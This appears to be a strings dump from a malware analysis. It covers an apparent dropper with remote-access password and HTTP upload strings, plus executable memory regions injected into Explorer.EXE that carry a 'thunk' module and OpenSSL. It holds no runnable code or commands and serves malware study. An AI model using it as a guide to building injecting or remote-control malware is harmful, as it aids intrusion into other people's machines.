Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0

conhost.exe_1088:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

brastub6ab_amobl_inst.exe_1788:

.text
`.rdata
@.data
.rsrc
@.reloc
&h.qVh
t%SSj
s=%sP
zexef
t.htFD
operator
operator ""
%S#[k
%s\%s%s
ShellExecuteA
12:12:35
12:12:33
12:12:32
HttpEndRequestA
HttpOpenRequestW
HttpAddRequestHeadersA
HttpQueryInfoA
RegEnumKeyExA
RegOpenKeyExW
WHttpSendRequestWQv|mzvm|Om|Ti{|Z,kHZlEC@VZAfEWZ_447c259d51c-2d1c?;l:6h8hk3:i7l?g3jk7>>8?6ik7ll=i?Akj<k5mj@n?@:@jB;B?<jkm<?lA6B?k>7?9>j=7?7k=;h4mGw.||{x (ba7jgam@o;?m9>l6Bk9n@koUz
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.cfguard
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.rsrc$01
.rsrc$02
KERNEL32.dll
USER32.dll
RegCloseKey
RegCreateKeyExW
RegEnumKeyW
RegOpenKeyW
RegDeleteKeyW
ADVAPI32.dll
WININET.dll
GetCPInfo
GetProcessHeap
.?AVCHttpAsync@@
.?AVCHttp@@
ForceRemove 't.exe'
ForceRemove t_Service.exe'
CLSID = s '%CLSID_APP%'
CLSID = s '%CLSID_SVC%'
ForceRemove %CLSID_APP% = s t Application Class'
ForceRemove %CLSID_SVC% = s t Service Class'
stdole2.tlbWWW
)TvApplicationTypeQuickSupportWWW
TvApplicationTypeQuickJoinWW
TvApplicationTypePortableWWW
TvTextResourceIDMeetingURLPrefix
IsPasswordRequiredWW
UnlockWithPasswordWW
sPasswordWWW
sSaltedPasswordHashW
s|sPasswordSaltWWW
SetPermanentPassword
HasPermanentPassword
\BAddAdditionalPermanentPasswordWithKeyWWW
sKey
DeleteAdditionalPermanentPasswordWithKey
HasAdditionalPermanentPasswordWithKeyWWWX
Password
psPasswordWWL
bAllowInteractiveLoginWW
Created by MIDL version 7.00.0555 at Fri Sep 11 17:24:57 2015
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="x86" name="t.exe" type="win32"></assemblyIdentity><description></description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><asmv2:trustInfo xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns="urn:schemas-microsoft-com:asm.v3"><asmv2:security><asmv2:requestedPrivileges><asmv2:requestedExecutionLevel level="asInvoker" uiAccess="false"></asmv2:requestedExecutionLevel></asmv2:requestedPrivileges></asmv2:security></asmv2:trustInfo><asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings"><dpiAware>true</dpiAware></asmv3:windowsSettings></asmv3:application><compat:compatibility xmlns:compat="urn:schemas-microsoft-com:compatibility.v1"><compat:application><compat:supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></compat:supportedOS><compat:supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></compat:supportedOS><compat:supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></compat:supportedOS><compat:supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></compat:supportedOS><compat:supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></compat:supportedOS></compat:application></compat:compatibility></assembly>
=#=/=[=~=
5$5,5_5|5
5(545<5}5
2(242<2}2
6 6`696{6
0!0&0.050{0
8%8-8b8n8w8}8
88N8V8d8j8s8~8
1)22272?2
9(949<9}9
3(343<3_3
>'>0>7>\>}>
1#2(2.272}2
:#:.:6:<:
6'6,686@6
7|7
4 515>5[5
6|7t7
=$=(=,=0=
= =(=0=8=@=
*1.12161
mscoree.dll
ext-ms-win-ntuser-windowstation-l1-1-0
Windows NT 6.1
Advapi32.dll
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="%s"
https
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7e716838d7d94d0295bb19a218d3a32e\brastub6ab_amobl_inst.exe
12.0.44444.0
t.exe

Explorer.EXE_284_rwx_01DA0000_00006000:

hal.dll
ntoskrnl.exe
KeFreeKeyValue
KeWriteKeyValue
KeReadKeyValue
KePushMsg
KeFreeMsg
KeNewMsg
KeRegisterMsg
KeReportData
KeNewNetMsg
%x,%x
{X-X-X-XX-XXXXXX},%p,%x,%p,%d,%d
NtDelayExecution
GetProcessHeap
%d,%x
d:\project\gate\src\thunk\objfre_wxp_x86\i386\thunk.pdb
thunk.dll
KeDelayExecutionThread
entdll.dll
kernel32.dll

Explorer.EXE_284_rwx_088E0000_00224000:

.text
`.rdata
@.data
.rsrc
@.reloc
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <appro@openssl.org>
RC4 for x86, CRYPTOGAMS by <appro@openssl.org>
AES for Intel AES-NI, CRYPTOGAMS by <appro@openssl.org>
Camellia for x86 by <appro@openssl.org>
SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
SHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>
GHASH for x86, CRYPTOGAMS by <appro@openssl.org>
Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
GF(2^m) Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>
urld
PSSh<
PSShd
FH<.tN<[tJ<\tF<*tB<|t><^t:<$t6
t.Hu7
w%s( 
)<,u%S
vhVj%Sj
9|$,v%U
//!"#$%&'()/*/// ,-/.
FtPWW
x@j%Sj
FtPU
j.Yf;
_tcPVj@
.PjRW
%s %s
system32\drivers\%s.sys
Tcpip
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
MD5 part of OpenSSL 1.0.2h 3 May 2016
AES part of OpenSSL 1.0.2h 3 May 2016
x509_pkey
evp_pkey
ssl_cert
ssl_sess_cert
%s(%d): OpenSSL internal error, assertion failed: %s
x509 certificate routines
DSO support routines
passed a null parameter
error:lX:%s:%s:%s
Stack part of OpenSSL 1.0.2h 3 May 2016
Big Number part of OpenSSL 1.0.2h 3 May 2016
\X
cert_info
X.509 part of OpenSSL 1.0.2h 3 May 2016
OPENSSL_ALLOW_PROXY_CERTS
setct-AcqCardCodeMsgTBE
setct-CertReqTBE
setct-CertReqTBEX
setct-CertResTBE
setCext-certType
setCext-cCertRequired
setAttr-Cert
set-rootKeyThumb
JOINT-ISO-ITU-T
joint-iso-itu-t
msSmartcardLogin
Microsoft Smartcardlogin
proxyCertInfo
Proxy Certificate Information
certicom-arc
certificateIssuer
X509v3 Certificate Issuer
id-PasswordBasedMAC
password based MAC
dhKeyAgreement
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-None-KeyMeshing
challengePassword
extendedCertificateAttributes
nsCertExt
Netscape Certificate Extension
LocalKeySet
Microsoft Local Key set
nsCertType
Netscape Cert Type
nsBaseUrl
Netscape Base Url
nsRevocationUrl
Netscape Revocation Url
nsCaRevocationUrl
Netscape CA Revocation Url
nsRenewalUrl
Netscape Renewal Url
nsCaPolicyUrl
Netscape CA Policy Url
nsCertSequence
supportedApplicationContext
Netscape Certificate Sequence
subjectKeyIdentifier
userPassword
X509v3 Subject Key Identifier
userCertificate
keyUsage
cACertificate
X509v3 Key Usage
privateKeyUsagePeriod
certificateRevocationList
X509v3 Private Key Usage Period
crossCertificatePair
supportedAlgorithms
certificatePolicies
X509v3 Certificate Policies
authorityKeyIdentifier
X509v3 Authority Key Identifier
anyExtendedKeyUsage
Any Extended Key Usage
extendedKeyUsage
dhSinglePass-stdDH-sha1kdf-scheme
X509v3 Extended Key Usage
dhSinglePass-stdDH-sha224kdf-scheme
dhSinglePass-stdDH-sha256kdf-scheme
dhSinglePass-stdDH-sha384kdf-scheme
dhSinglePass-stdDH-sha512kdf-scheme
TLS Web Server Authentication
dhSinglePass-cofactorDH-sha1kdf-scheme
dhSinglePass-cofactorDH-sha224kdf-scheme
TLS Web Client Authentication
dhSinglePass-cofactorDH-sha256kdf-scheme
dhSinglePass-cofactorDH-sha384kdf-scheme
dhSinglePass-cofactorDH-sha512kdf-scheme
ct_precert_scts
CT Precertificate SCTs
ct_precert_poison
CT Precertificate Poison
ct_precert_signer
CT Precertificate Signer
ct_cert_scts
CT Certificate SCTs
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
keyBag
pkcs8ShroudedKeyBag
certBag
localKeyID
x509Certificate
sdsiCertificate
id-smime-mod-msg-v3
id-smime-ct-publishCert
id-smime-aa-msgSigDigest
id-smime-aa-encrypKeyPref
id-smime-aa-signingCertificate
id-smime-aa-smimeEncryptCerts
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-certValues
id-smime-aa-ets-certCRLTimestamp
id-mod-qualified-cert-88
id-mod-qualified-cert-93
id-mod-attribute-cert
id-it-caProtEncCert
id-it-signKeyPairTypes
id-it-encKeyPairTypes
id-it-caKeyUpdateInfo
id-it-unsupportedOIDs
id-it-keyPairParamReq
id-it-keyPairParamRep
id-it-revPassphrase
id-regCtrl-oldCertID
id-regCtrl-protocolEncrKey
id-regInfo-certReq
id-cmc-getCert
id-cmc-confirmCertAcceptance
id-ecPublicKey
set-msgExt
set-certExt
certificate extensions
setct-AcqCardCodeMsg
setct-PCertReqData
setct-PCertResTBS
setct-CertReqData
setct-CertReqTBS
setct-CertResData
setct-CertInqReqTBS
crlUrl
certs
issuerKeyHash
OCSP_CERTID
reqCert
value.byName
value.byKey
value.good
value.revoked
value.unknown
OCSP_CERTSTATUS
certId
certStatus
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT
EXPORT40
EXPORT56
ALL:!EXPORT:!LOW:!aNULL:!eNULL:!SSLv2
CLIENT_CERTIFICATE
CLIENT_MASTER_KEY
DTLS1_ADD_CERT_TO_BUF
dtls1_output_cert_chain
dtls1_send_certificate_request
dtls1_send_client_certificate
dtls1_send_client_key_exchange
dtls1_send_server_certificate
dtls1_send_server_key_exchange
GET_CLIENT_MASTER_KEY
GET_SERVER_STATIC_DH_KEY
REQUEST_CERTIFICATE
ssl2_generate_key_material
ssl2_set_certificate
SSL3_ADD_CERT_TO_BUF
ssl3_check_cert_and_algorithm
SSL3_GENERATE_KEY_BLOCK
ssl3_get_certificate_request
ssl3_get_cert_status
ssl3_get_cert_verify
ssl3_get_client_certificate
ssl3_get_client_key_exchange
ssl3_get_key_exchange
ssl3_get_server_certificate
ssl3_output_cert_chain
ssl3_send_certificate_request
ssl3_send_client_certificate
ssl3_send_client_key_exchange
ssl3_send_server_certificate
ssl3_send_server_key_exchange
ssl3_setup_key_block
ssl_add_cert_chain
SSL_ADD_CERT_TO_BUF
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
ssl_build_cert_chain
ssl_cert_dup
ssl_cert_inst
SSL_CERT_INSTANTIATE
ssl_cert_new
SSL_check_private_key
ssl_check_srvr_ecc_cert_and_alg
SSL_CONF_cmd
SSL_CTX_check_private_key
SSL_CTX_set_client_cert_engine
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_GET_SERVER_CERT_INDEX
SSL_GET_SERVER_SEND_CERT
ssl_get_server_send_pkey
ssl_get_sign_pkey
ssl_sess_cert_new
SSL_SET_CERT
SSL_SET_PKEY
bad dh pub key length
bad dh pub key value
bad ecc cert
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
ssl_verify_cert_chain
tls1_cert_verify_mac
tls1_export_keying_material
tls1_setup_key_block
certificate verify failed
cert cb error
cert length mismatch
dh key too small
ecc cert not for key agreement
ecc cert not for signing
ecc cert should have rsa signature
ecc cert should have sha1 signature
error generating tmp rsa key
https proxy request
http request
invalid null cmd name
invalid ticket keys length
key arg too long
krb5 server rd_req (keytab perms?)
missing dh dsa cert
missing dh key
missing dh rsa cert
missing dsa signing cert
missing ecdh cert
missing ecdsa signing cert
missing export tmp dh key
missing export tmp rsa key
missing rsa certificate
missing rsa encrypting cert
missing rsa signing cert
missing tmp dh key
missing tmp ecdh key
missing tmp rsa key
missing tmp rsa pkey
no certificates returned
no certificate assigned
no certificate returned
no certificate set
no certificate specified
no ciphers passed
no client cert method
no client cert received
Peer haven't sent GOST certificate, required for selected ciphersuite
no privatekey
no private key assigned
no publickey
null ssl method passed
peer did not return a certificate
peer error certificate
peer error no certificate
peer error unsupported certificate type
public key encrypt error
public key is not rsa
public key not rsa
reuse cert length not zero
reuse cert type not zero
signature for non signing certificate
sslv3 alert bad certificate
sslv3 alert certificate expired
sslv3 alert certificate revoked
sslv3 alert certificate unknown
sslv3 alert no certificate
sslv3 alert unsupported certificate
tlsv1 alert export restriction
tlsv1 bad certificate hash value
tlsv1 bad certificate status response
tlsv1 certificate unobtainable
tlsv1 unsupported extension
tls client cert req with anon cipher
tls illegal exporter label
tls peer did not respond with certificate list
tried to use unsupported cipher
unable to decode dh certs
unable to decode ecdh certs
unable to extract public key
unable to find public key parameters
unknown certificate type
unknown cmd name
unknown key exchange type
unknown pkey type
unsupported cipher
unsupported compression algorithm
unsupported digest type
unsupported elliptic curve
unsupported protocol
unsupported ssl version
unsupported status type
wrong certificate type
wrong number of key bits
fips mode not supported
BIO_get_port
broken pipe
no accept port specified
no port defined
no port specified
unsupported method
d2i_AutoPrivateKey
d2i_PrivateKey
d2i_PublicKey
d2i_X509_PKEY
i2d_DSA_PUBKEY
i2d_EC_PUBKEY
i2d_PrivateKey
i2d_PublicKey
i2d_RSA_PUBKEY
X509_PKEY_new
bad password read
digest and key type not supported
private key header missing
streaming not supported
unable to decode rsa key
unable to decode rsa private key
unknown public key type
unsupported any defined by type
unsupported encryption algorithm
unsupported public key type
unsupported type
wrong public key type
d2i_ECPrivateKey
DO_EC_KEY_PRINT
ECKEY_PARAM2TYPE
ECKEY_PARAM_DECODE
ECKEY_PRIV_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PUB_DECODE
ECKEY_PUB_ENCODE
ECKEY_TYPE2PARAM
EC_KEY_check_key
EC_KEY_copy
EC_KEY_generate_key
EC_KEY_new
EC_KEY_print
EC_KEY_print_fp
EC_KEY_set_public_key_affine_coordinates
i2d_ECPrivateKey
i2o_ECPublicKey
o2i_ECPublicKey
PKEY_EC_CTRL
PKEY_EC_CTRL_STR
PKEY_EC_DERIVE
PKEY_EC_KEYGEN
PKEY_EC_PARAMGEN
PKEY_EC_SIGN
gf2m not supported
invalid private key
keys not set
missing private key
not a supported NIST prime
passed null parameter
peer key error
unsupported field
zlib not supported
data too large for key size
data too small for key size
digest too big for rsa key
illegal or unsupported padding mode
invalid keybits
key size too small
operation not allowed in fips mode
operation not supported for this keytype
rsa operations not supported
unsupported encryption type
unsupported label source
unsupported mask algorithm
unsupported mask parameter
unsupported signature type
PKEY_RSA_CTRL
PKEY_RSA_CTRL_STR
PKEY_RSA_SIGN
PKEY_RSA_VERIFY
PKEY_RSA_VERIFYRECOVER
RSA_BUILTIN_KEYGEN
RSA_check_key
RSA_generate_key
RSA_generate_key_ex
COMPUTE_KEY
DH_CMS_SET_PEERKEY
DH_compute_key
DH_generate_key
GENERATE_KEY
PKEY_DH_DERIVE
PKEY_DH_KEYGEN
invalid public key
DSA_generate_key
PKEY_DSA_CTRL
PKEY_DSA_KEYGEN
ECDH_compute_key
AESNI_INIT_KEY
AES_INIT_KEY
AES_T4_INIT_KEY
CAMELLIA_INIT_KEY
CMLL_T4_INIT_KEY
D2I_PKEY
DSAPKEY2PKCS8
DSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECKEY_PKEY2PKCS8
EVP_CIPHER_CTX_set_key_length
EVP_PKCS82PKEY
EVP_PKCS82PKEY_BROKEN
EVP_PKEY2PKCS8_broken
EVP_PKEY_copy_parameters
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_dup
EVP_PKEY_decrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_old
EVP_PKEY_derive
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_encrypt
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_old
EVP_PKEY_get1_DH
EVP_PKEY_get1_DSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_RSA
EVP_PKEY_keygen
EVP_PKEY_keygen_init
EVP_PKEY_new
EVP_PKEY_paramgen
EVP_PKEY_paramgen_init
EVP_PKEY_sign
EVP_PKEY_sign_init
EVP_PKEY_verify
EVP_PKEY_verify_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover_init
FIPS_CIPHER_CTX_SET_KEY_LENGTH
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_V2_PBKDF2_KEYIVGEN
PKEY_SET_TYPE
aes key setup failed
bad key length
bn pubkey error
camellia key setup failed
command not supported
ctrl operation not implemented
different key types
expecting an rsa key
expecting a dh key
expecting a dsa key
expecting a ecdsa key
expecting a ec key
invalid key length
invalid operation
keygen failure
method not supported
no key set
no operation set
operaton not initialized
private key decode error
private key encode error
unsuported number of rounds
unsupported algorithm
unsupported keylength
unsupported key derivation function
unsupported key size
unsupported prf
unsupported private key algorithm
unsupported salt type
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
DO_PK8PKEY
DO_PK8PKEY_FP
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_PK8PKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
error converting private key
expecting private key blob
expecting public key blob
keyblob header parse error
keyblob too short
problems getting password
public key no rsa
read key
unsupported encryption
unsupported key components
certificate verify error
decrypted key is wrong length
encryption not supported for this key type
no recipient matches certificate
no recipient matches key
operation not supported on this type
private key does not match certificate
signer certificate not found
signing not supported for this key type
unable to find certificate
unknown operation
unsupported cipher type
unsupported content type
PKCS7_add_certificate
cant check dh key
cert already in hash table
key type mismatch
key values mismatch
loading cert dir
no cert set for us to verify
public key decode error
public key encode error
unable to get certs public key
unknown key type
ADD_CERT_DIR
GET_CERT_BY_SUBJECT
X509_check_private_key
X509_get_pubkey_parameters
X509_load_cert_crl_file
X509_load_cert_file
X509_PUBKEY_get
X509_PUBKEY_set
X509_REQ_check_private_key
X509_STORE_add_cert
X509_verify_cert
R2I_CERTPOL
S2I_ASN1_SKEY_ID
S2I_SKEY_ID
V2I_AUTHORITY_KEYID
V2I_EXTENDED_KEY_USAGE
extension setting not supported
no issuer certificate
no proxy cert policy language defined
no public key
operation not defined
policy syntax not currently supported
unable to get issuer keyid
unsupported option
PKCS12_add_localkeyid
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_newpass
PKCS12_PBE_keyivgen
PKCS8_add_keyusage
key gen error
unsupported pkcs12 mode
WIN32_JOINER
functionality not supported
ENGINE_cmd_is_executable
ENGINE_ctrl_cmd
ENGINE_ctrl_cmd_string
ENGINE_get_pkey_asn1_meth
ENGINE_get_pkey_meth
ENGINE_load_private_key
ENGINE_load_public_key
ENGINE_load_ssl_client_cert
ENGINE_UNLOAD_KEY
cmd not executable
failed loading private key
failed loading public key
invalid cmd name
invalid cmd number
unimplemented public key method
OCSP_cert_id_new
OCSP_parse_url
PARSE_HTTP_LINE1
error parsing url
no certificates in chain
unsupported requestorname type
ESS_ADD_SIGNING_CERT
ESS_CERT_ID_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
TS_CHECK_SIGNING_CERTS
TS_MSG_IMPRINT_set_algo
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_TST_INFO_set_msg_imprint
TS_VERIFY_CERT
ess add signing cert error
ess signing certificate error
invalid signer certificate purpose
unsupported md algorithm
unsupported version
certificate already present
certificate has no keyid
error getting public key
error setting key
invalid encrypted key length
invalid key encryption parameter
msgsigdigest error
msgsigdigest verification failure
msgsigdigest wrong length
not key agreement
not key transport
not supported for this key type
no key
no key or cert
no msgsigdigest
no password
no private key
unsupported kek algorithm
unsupported key encryption algorithm
unsupported recipient type
unsupported recpientinfo type
CMS_add0_cert
CMS_add0_recipient_key
CMS_add0_recipient_password
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_password
CMS_decrypt_set1_pkey
CMS_EncryptedData_set1_key
CMS_GET0_CERTIFICATE_CHOICES
cms_msgSigDigest_add1
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_password
CMS_RecipientInfo_set0_pkey
cms_set1_keyid
CMS_SIGNERINFO_VERIFY_CERT
lhash part of OpenSSL 1.0.2h 3 May 2016
0123456789
CONF part of OpenSSL 1.0.2h 3 May 2016
ASN.1 part of OpenSSL 1.0.2h 3 May 2016
EC part of OpenSSL 1.0.2h 3 May 2016
.\crypto\ec\ec_key.c
public_key
X509_PUBKEY
.\crypto\asn1\x_pubkey.c
'() ,-./:=?
x%s
%s - d:d:d%.*s %d%s
keyid
X509_CERT_AUX
X509_CERT_PAIR
AUTHORITY_KEYID
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
name.fullname
name.relativename
%*s%s:
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
%d.%d.%d.%d/%d.%d.%d.%d
pkeyalg
pkey
PKCS8_PRIV_KEY_INFO
.\crypto\evp\evp_pkey.c
RSA part of OpenSSL 1.0.2h 3 May 2016
Diffie-Hellman part of OpenSSL 1.0.2h 3 May 2016
DSA part of OpenSSL 1.0.2h 3 May 2016
value.set
value.single
ddddddZ
ddddddZ
value.named_curve
value.parameters
value.implicitlyCA
privateKey
publicKey
EC_PRIVATEKEY
p.other
p.onBasis
p.tpBasis
p.ppBasis
p.prime
p.char_two
pub_key
priv_key
d.other
d.data
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert
key_enc_algor
enc_key
pubkey
Content-Length: %d
%s %s HTTP/1.0
SHA1 part of OpenSSL 1.0.2h 3 May 2016
SHA-256 part of OpenSSL 1.0.2h 3 May 2016
SHA-512 part of OpenSSL 1.0.2h 3 May 2016
CERTIFICATE
unable to get issuer certificate
unable to get certificate CRL
unable to decrypt certificate's signature
unable to decode issuer public key
certificate signature failure
certificate is not yet valid
certificate has expired
format error in certificate's notBefore field
format error in certificate's notAfter field
self signed certificate
self signed certificate in certificate chain
unable to get local issuer certificate
unable to verify the first certificate
certificate chain too long
certificate revoked
invalid CA certificate
invalid non-CA certificate (has CA markings)
proxy certificates not allowed, please set the appropriate flag
unsupported certificate purpose
certificate not trusted
certificate rejected
authority and subject key identifier mismatch
key usage does not include certificate signing
unable to get CRL issuer certificate
key usage does not include CRL signing
key usage does not include digital signature
invalid or inconsistent certificate extension
invalid or inconsistent certificate policy extension
Unsupported extension feature
name constraints minimum and maximum not supported
unsupported name constraint type
unsupported or invalid name constraint syntax
unsupported or invalid name syntax
Suite B: certificate version invalid
Suite B: invalid public key algorithm
.\crypto\engine\eng_pkey.c
PEM part of OpenSSL 1.0.2h 3 May 2016
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
X509 CERTIFICATE
NEW CERTIFICATE REQUEST
CERTIFICATE REQUEST
TRUSTED CERTIFICATE
os.length <= (int)sizeof(ret->session_id)
OpenSSL 1.0.2h 3 May 2016
.\ssl\ssl_cert.c
TLSv1 part of OpenSSL 1.0.2h 3 May 2016
value.other
value.x509cert
value.sdsicert
value.keybag
value.shkeybag
value.safes
value.bag
DES part of OpenSSL 1.0.2h 3 May 2016
libdes part of OpenSSL 1.0.2h 3 May 2016
IDEA part of OpenSSL 1.0.2h 3 May 2016
EVP part of OpenSSL 1.0.2h 3 May 2016
RC2 part of OpenSSL 1.0.2h 3 May 2016
.pp@0
aEÐ
